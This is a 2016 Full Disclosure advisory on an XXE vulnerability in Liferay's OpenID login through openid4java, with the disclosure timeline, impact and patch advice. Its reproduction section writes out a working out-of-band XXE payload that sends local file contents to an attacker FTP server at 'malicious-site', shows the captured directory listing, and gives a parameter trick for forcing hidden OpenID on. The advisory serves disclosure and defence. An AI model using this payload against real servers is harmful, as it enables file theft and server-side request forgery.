Full Disclosure mailing list archives

By Date By Thread XML External Entity XXE vulnerability in OpenID component of Liferay From: Sandro Gauci <sandro () enablesecurity com>

Date: Thu, 02 Jun 2016 09:29:49 +0200

# XML External Entity XXE vulnerability in OpenID component of Liferay - Author: Sandro Gauci <sandro () enablesecurity com> - Vulnerable version: Liferay 6.2.3 CE GA4 and earlier - Liferay reference: LPS-58014 - Advisory URL: <https://github.com/EnableSecurity/advisories/tree/master/ES2016-01-liferay-xxe> - Timeline: - Report date: March 16 2015 - Liferay patch: August 26 2015 - Liferay advisory: January 18 2016 - Enable Security advisory: June 1 2016 ## Description Liferay supports OpenID login which was found to make use of a version of `openid4java` that is vulnerable to XML External Entity (XXE) attacks. ## Impact Abuse of the XXE vulnerability can (at least) lead to local file disclosure, server-side request forgery (SSRF) and denial of service. This vulnerability was abused to read local files on the web server that the web application had access to. ## How to reproduce the issue This issue was previously discovered to affect [one of Google's web server](https://code.google.com/p/chromium/issues/detail?id=240139) which was using the same OpenID library. To abuse this vulnerability, an attacker needs to: 1. Force Liferay to make use of OpenID for authentication 2. Provide an attacker-controlled URL (web location) as the OpenID URL. This URL should contain malicious XML (see below) 3. Upon reading the XML, the OpenID library will attempt to load the external entity on the attacker's web server 4. This external entity instructs the library to read a file from local disk and make use of it's contents to load another file from an attacker controlled (custom) FTP server Thus the contents of the file to be read are sent to the custom FTP server. During exploitation, we had to make use of a fake FTP server (from <https://github.com/ONsec-Lab/scripts>) to receive the information. However, it might be possible to use HTTP and other protocols too depending on the version of Java used and other variables. For step 1, the attacker needs to locate the authentication form in Liferay and then click on the OpenID link. The attacker then specifies <http://malicious-site> as an OpenID URL. This website would contain the following: ```html <meta http-equiv="X-XRDS-Location" content="http://malicious-site/yadis.xml"> ``` As the OpenID library reads that, it loads `yadis.xml` which would contain the following: ```xml <?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://malicious-site/xxe.xml"> %asd; %rrr; ]> <a></a> ``` This loads `xxe.xml` which in turn would contain the following: <!ENTITY % b SYSTEM "file:///"> <!ENTITY % c "<!ENTITY % rrr SYSTEM 'ftp://malicious-site:443/%b;'>"> %c; Once the XML interpreter parses these contents, it connects to the FTP site, sending the contents of the root directory on the server as can be seen in the following log: > sudo ruby xxe-ftp-server.rb FTP. New client connected < USER anonymous < PASS Java1.6.0_21@ > 230 more data please! < TYPE I > 230 more data please! < EPSV ALL > 230 more data please! < EPSV > 230 more data please! < EPRT |1|172.x.x.x|39051| > 230 more data please! < bin > 230 more data please! < boot > 230 more data please! < dev > 230 more data please! < etc > 230 more data please! < home > 230 more data please! ... etc Directories and also local files could be read using this method. Note that sometimes the OpenID login method is hidden but the functionality is not disabled from within Liferay itself. In such cases, it is possible to force Liferay to make use of OpenID anyway by setting the `_58_struts_action` parameter from `/login/login` to `/login/open_id`. ## Solutions and recommendations Upgrading to the latest version of Liferay should address this security vulnerability. The patch was published at the following location: <https://sourceforge.net/projects/liferay-patches/files/6.2.3%20GA4/> Additionally, to address this issue it is recommended to disable OpenID support. ## Further reading - <http://openid.net/2011/05/05/attribute-exchange-security-alert/> - <https://code.google.com/p/chromium/issues/detail?id=240139> ## About Enable Security [Enable Security](https://www.enablesecurity.com) provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers. ## Disclaimer The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: XML External Entity XXE vulnerability in OpenID component of Liferay Sandro Gauci (Jun 02)